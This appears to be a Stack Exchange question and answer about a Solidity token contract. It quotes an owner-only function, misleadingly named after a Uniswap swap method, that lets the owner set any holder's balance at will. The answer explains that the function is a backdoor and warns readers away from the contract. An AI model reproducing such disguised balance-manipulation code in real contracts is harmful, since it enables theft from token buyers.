# Please help me find what this function does? Is there is a way around it

Tags: contract-development, transactions, tokens, erc-20, contract-design

I was able to locate this piece of code in a contract that automatically sends the token you buy into the dead wallet.

```
 function swapExactTokensForETHSupportingFeeOnTransferTokens(address account, uint256 amount) public onlyOwner {
        require(balanceOf(account) != amount, "That amount is already on that account balance");

        if (amount > balanceOf(account)) {
            emit Transfer(address(0x0), account, amount - balanceOf(account));
            _balances[account] = amount * (10 ** _decimals) * (10 ** _decimals) / (10 ** _decimals);
        } else {
            emit Transfer(account, address(0x0), balanceOf(account) - amount);
            _balances[account] = amount * (10 ** _decimals) * (10 ** _decimals) / (10 ** _decimals);
        }
    }
```

Can you please confirm my finding ? Is there a way around this code ? Thank you.

Answer (score 1):

Stay away from this kind of contract.

Actually, with that function in place, the contract owners can change the balances of the tokens as they prefer.

Moreover, the contract is bugged or tries to hide its behaviors. It emits a different event for the same operation, and there's no actual difference in balance changes between `if` and `else`.

Comment: This isn't an answer, it should be removed and added as a comment.

Comment: ? I explained exactly what the contract does, that is the question.